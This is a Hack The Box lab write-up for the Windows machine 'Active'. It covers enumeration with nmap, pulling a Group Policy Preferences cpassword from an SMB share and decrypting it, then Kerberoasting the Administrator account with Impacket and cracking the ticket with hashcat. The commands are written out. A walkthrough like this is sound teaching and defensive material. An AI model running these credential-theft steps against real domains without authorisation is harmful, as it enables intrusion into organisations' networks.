HTB - Active Writeup

👾 Machine Overview

This is a writeup of the Windows machine Active from HTB , it’s an easy difficulty windows machine which featured credentials stored in insecure Group Policy Preferences, and Kerberoastable accounts.

🥈 User

🔍 Enumeration

An initial nmap scan of the host gave the following results:

nmap -sV -sC 10.129.230.204                                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 08:57 EDT
Nmap scan report for 10.129.230.204
Host is up (0.023s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-30 12:57:48Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-05-30T12:58:42
|_  start_date: 2024-05-30T12:54:57

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.01 seconds

SMB

I was able to anonymously list SMB shares on the host, and found a couple notable ones:

Initially we only have the ability to read the Replication share, which contained some group policy backups. Notably there’s a Groups.xml file. This file comes from Group Policy Preferences, a configuration which allows domain joined machines to be managed through group policy.

GPP

In older implementations of this the Groups.xml files stored on Domain Controllers contain encrypted credentials, called a cPassword. These cPasswords are encrypted with AES, but the key is published by Microsoft.

Pillaged Groups.xml:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
	<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
		<Properties action="U" newName="" fullName="" description="" cpassword="[redacted]" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
	</User>
</Groups>

This file contains the encrypted password for the SVC_TGS user, which can be decrypted using gpp-decrypt, Metasploit, etc.

🚩 Getting the Flag

Voila, we have credentials for SVC_TGS, which gave us read access to the Users share.

Using smbclient we can download the user flag, the credentials don’t work to login via WinRM.

🥇 Root

Using Impacket-GetUserSPNs we’re able to identify Administrator as a kerberoastable account, and get a ticket to crack with hashcat.

# Kerberoast
impacket-GetUserSPNs -request -dc-ip [IP] active.htb/SVC_TGS -outputfile kerbroast.hash

# Crack the hash
hashcat -a 0 -m 13100 ./kerbroast.hash /usr/share/wordlists/rockyou.txt

From there the Administrator credentials can be used to login, or pop a shell and get the flag:

📖 Resources

🔗 Hyperlink	ℹ️ Info
Cybersec Notes	Kerberoasting Notes
MindPoint	GPP PrivEsc